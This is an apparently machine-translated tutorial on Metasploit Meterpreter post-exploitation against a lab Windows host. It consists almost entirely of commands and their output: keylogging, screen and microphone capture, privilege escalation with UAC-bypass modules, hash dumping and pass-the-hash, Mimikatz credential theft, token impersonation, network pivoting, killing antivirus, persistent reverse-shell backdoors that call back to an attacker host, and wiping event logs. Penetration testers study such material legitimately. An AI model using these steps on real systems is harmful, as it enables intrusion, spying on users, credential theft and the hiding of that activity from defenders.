Post MSF infiltration summary

file

1. File interaction instructions

2. Upload and download files

Capture control device information

【1】 Capture screen
You can use the following command to capture the screen

screenshot

Return results

meterpreter > screenshot
Screenshot saved to: /home/adian/ooTGibPg.jpeg

【2】 Capture microphone
command

run sound_recorder

Default recording 30 Second sound , If it takes longer , Need to use -l Parameters

meterpreter > run sound_recorder
[*] Saving recorded audio to /root/.msf4/logs/scripts/sound_recorder/WIN-ITNJLFM93P3_20210520.1422
[*] Recording a total of 0m 30s

Get keyboard records

command

run post/windows/capture/keylog_recorder

result

[*] Executing module against WIN-ITNJLFM93P3_1.wav
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20210520231706_TestWin7_10.10.10.132_host.windows.key_377741.txt
[*] Recording keystrokes...
[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...

Or use

keyscan_start

After capture, you can use

keyscan_dump

To get content

If you need to stop , Use the following command

keyscan_stop

Increase authority

Use the following command to obtain the permission level

getuid

So far we are system jurisdiction

Server username: NT AUTHORITY\SYSTEM

If we're not system jurisdiction , We can directly use the following commands to increase the permissions

getsystem

Once I failed to raise the right , So I tried Bypass UAC Raise the right ：
First

bg

hold session preserved

Then try to use the following two modules in turn to raise the right ：

use exploit/windows/local/bypassuac  # When the module runs, it will be recognized by antivirus software because it creates multiple files on the target machine , Therefore, the success rate of power raising through this module is very low .
use exploit/windows/local/bypassuac_injection  # The module runs directly in memory reflection DLL in , So it doesn't touch the hard disk of the target machine , So as to reduce the probability of being detected by anti-virus software .

When using these two modules , The first one didn't succeed , But the second one succeeded .

Mining user names and passwords

Windows System How to store hashes It's usually LAN Manager(LM),NT LAN Manager(NTLM), perhaps NT LAN Manager V2(NTLMv2)

stay msf in , We can use hashdump Command to obtain the hash values of all user names and passwords in the system

hashdump

This command requires system jurisdiction

Pass hash value login

We use windows/smb/psexec Module to pass the hash value

We will get the hash value of set to SMBUser and SMBPass, For example, we get hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

to SMBUser

Administrator

to SMBPass

aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

Crack plain text passwords

stay Meterpreter Next , Use Mimikatz Get password

First load Mimikatz modular

load mimikatz

The results are as follows

Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

stay msf6 in ,mimikatz By kiwi Replaced the

The "mimikatz" extension has been replaced by "kiwi". Please use this in future.

The help documentation is as follows

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unpars
                           ed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCS
                           ync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

kiwi Have more comprehensive functions , Basically reserved mimikatz The function of

meterpreter > creds_msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

Username  Domain           LM                NTLM              SHA1
--------  ------           --                ----              ----
test      WIN-ITNJLFM93P3  aad3b435b51404ee  31d6cfe0d16ae931  da39a3ee5e6b4b0d
                           aad3b435b51404ee  b73c59d7e0c089c0  3255bfef95601890
                                                               afd80709

Fake token

steal_token

Using a fake token, you can impersonate another user in a network to operate , Such as upgrading user permissions , Create users, groups, etc , When the user logs in Windows when , He will be given an access token as part of the authentication session . For example, an intruder may need to perform operations as a domain administrator , You need to use fake tokens

Use ps Command to view the currently running application and the corresponding user

ps

The syntax of stealing token is as follows

steal_token PID

At this point, it is executed as the stolen user

incognito

Load this module first

load incognito

Carry out orders

list_tokens -u

You can view all available tokens

Use the following command to impersonate

impersonate_token domain\\name

Notice the two backslashes

Get the files deleted by the target host

Using modules

post/windows/gather/forensics/recovery_files

Set up DRIVE Drive letter and session id, You can recover

take MeterpreterShell Penetrate as a springboard

Use the following command to get the current subnet

run get_local_subnets

The results are as follows

meterpreter > run get_local_subnets 

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0

Here you can use post Module autoroute To automatically configure routing

meterpreter > run post/multi/manage/autoroute 

[!] SESSION may not be compatible with this module.
[*] Running module against WIN-ITNJLFM93P3
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
vc6.Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth

We can also add routes manually , First of all, we need to shell Put it in the background

background

Then add the route manually

route add  subnet   Mask   conversation ID

Meterpreter Script

Usage method

run  Script path / name 

Migration process

Script

post/windows/manage/migrate

Or you can use migrate Migrate permissions to the specified PID

migrate PID

Turn off antivirus software

run killav

stay msf6 Although you can also use , However, you will be prompted that it has been deprecated

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...

After testing , Unable to identify the tinder antivirus , however MS17-010 The attack was blocked by tinder

View all traffic on the target machine

Use packetrecorder Traffic hijacking , And then you can go through Wireshark Analyze

meterpreter > run packetrecorder -i 1

[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-ITNJLFM93P3_20210521.5655/WIN-ITNJLFM93P3_20210521.5655.cap
[*] Packet capture interval is 30 Seconds

Get system information

adopt scraper The script can enumerate all the information the user wants

meterpreter > run scraper 
[*] New session on 10.10.10.132:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Windows\TEMP\AoxTqVci.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\Windows\TEMP\xaFqszRg.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\Windows\TEMP\OqrObWNV.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\Windows\TEMP\rAJZLqAf.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\Windows\TEMP\esDrHZoB.reg)
[*]  Cleaning HKU
[*] Completed processing on 10.10.10.132:445...

Create persistent backdoors

Use persistence Scripts and metsv Create persistent backdoors

meterpreter > run persistence 

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-ITNJLFM93P3_20210521.0320/WIN-ITNJLFM93P3_20210521.0320.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444
[*] Persistent agent script is 99668 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ArDebnpVV.vbs
[*] Executing script C:\Windows\TEMP\ArDebnpVV.vbs
[+] Agent executed with PID 2524

Can pass

run peresistence -h

To see the help information , Create a custom back door

meterpreter > run metsvc 

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Windows\TEMP\nzDwNmYr...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

Use multi/handler Listen to establish a session , Note that at this time handler Of payload, otherwise session Meeting close

Add command line shell Upgrade to Meterpreter

Can directly

sessions -u ID

Remove traces

Use it directly irb that will do

meterpreter > irb
[*] Starting IRB shell...
>>

When entering >> When interacting, select the log to delete

log = client.sys.eventlog.open(‘system’)
log = client.sys.eventlog.open(‘security’)
log = client.sys.eventlog.open(‘application’)
log = client.sys.eventlog.open(‘directory service’)
log = client.sys.eventlog.open(‘dns server’)
log = client.sys.eventlog.open(‘file replication service’)

Finally delete

log.clear

Or use clearev

meterpreter > clearev 
[*] Wiping 299 records from Application...
[*] Wiping 939 records from System...
[*] Wiping 230 records from Security...